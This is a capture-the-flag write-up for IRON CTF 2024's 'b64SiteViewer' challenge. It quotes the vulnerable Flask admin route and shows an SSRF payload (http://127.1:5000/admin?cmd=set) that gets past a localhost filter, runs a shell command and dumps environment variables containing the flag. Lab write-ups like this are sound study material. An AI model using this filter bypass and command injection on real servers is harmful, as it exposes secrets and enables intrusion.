# IRON CTF 2024 - b64SiteViewer **Title:** b64SiteViewer **Description:** Hey everyone, check out my new Base64 site viewer! The admin believes he's invincible. Do you have what it takes to outsmart him? Flag Format: ironCTF{alphanumeric_lowercase} `https://b64siteviewer.1nf1n1ty.team/`: ![image](https://hackmd.io/_uploads/r1zeNHekkg.png) **Files:** ```bash chall ├── app.py ├── flag.sh ├── requirements.txt └── templates └── home.html ``` ## Solution: First, I started with examining the given `app.py` Flask application to find any weaknesses that could be used to access the flag. The application has two main routes: the home route (`/`) which retrieves and shows the base64-encoded content of a URL provided by the user. The `/admin` route is designed to execute shell commands provided via the `cmd` parameter. However, to prevent unauthorized access, it includes an IP address filter: ```python if request.remote_addr in ['', 'localhost']: cmd = request.args.get('cmd', 'id') if any(blacklisted in cmd for blacklisted in ['REDACTED', "'", '"']): return render_template_string('Command blocked') print(f"Executing: {cmd}") result = subprocess.run(cmd, shell=True, capture_output=True, text=True) return result.stdout return render_template_string("Don't hack me") ``` This filter is meant to restrict command execution to requests originating from the server itself (i.e., localhost). The IP filter specifically looks for `` and `localhost`. However, it doesn't account for IPv4 addresses like `127.1`, which are technically the same as `` because of how the loopback address range `(` is defined. This means that `127.1` still directs traffic to the loopback interface, but it's not explicitly blocked in the code. To exploit this oversight, I crafted a request to the `/admin` route using `'127.1'` as the hostname, bypassing the IP filter: ```bash http://127.1:5000/admin?cmd=set ``` Here's a breakdown of the payload: 1. **Bypassing the IP Filter:** Using `127.1`, which isn't blacklisted but still points to localhost, bypassing the IP check. 2. **Executing the Command:** The '`cmd` parameter is set to '`set`', which reveals environment variables, potentially including sensitive data like the flag. Upon entering the URL: `http://127.1:5000/admin?cmd=set`, this is the response I received: ```bash base64 version of the site: b'SUZTPScgCQonCkxDX0NUWVBFPSdDLlVURi04JwpPTERQV0Q9Jy8nCk9QVElORD0nMScKUEFUSD0nL3Vzci9sb2NhbC9zYmluOi91c3IvbG9jYWwvYmluOi91c3Ivc2JpbjovdXNyL2Jpbjovc2JpbjovYmluJwpQUElEPScyJwpQUzE9JyQgJwpQUzI9Jz4gJwpQUzQ9JysgJwpQV0Q9Jy9ob21lL3VzZXInClNITFZMPScxJwpXRVJLWkVVR19TRVJWRVJfRkQ9JzMnCl89Jy91c3IvbG9jYWwvYmluL3B5dGhvbicKZmxhZz0naXJvbkNURnt5MHU0cjNyMGNrMW42azMzcGg0Y2sxbjZ9Jwo=' ``` I decoded it, and here’s what I received: ```bash IFS=' ' LC_CTYPE='C.UTF-8' OLDPWD='/' OPTIND='1' PATH='/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin' PPID='2' PS1='$ ' PS2='> ' PS4='+ ' PWD='/home/user' SHLVL='1' WERKZEUG_SERVER_FD='3' _='/usr/local/bin/python' flag='ironCTF{y0u4r3r0ck1n6k33ph4ck1n6}' ``` And there's our flag: `ironCTF{y0u4r3r0ck1n6k33ph4ck1n6}`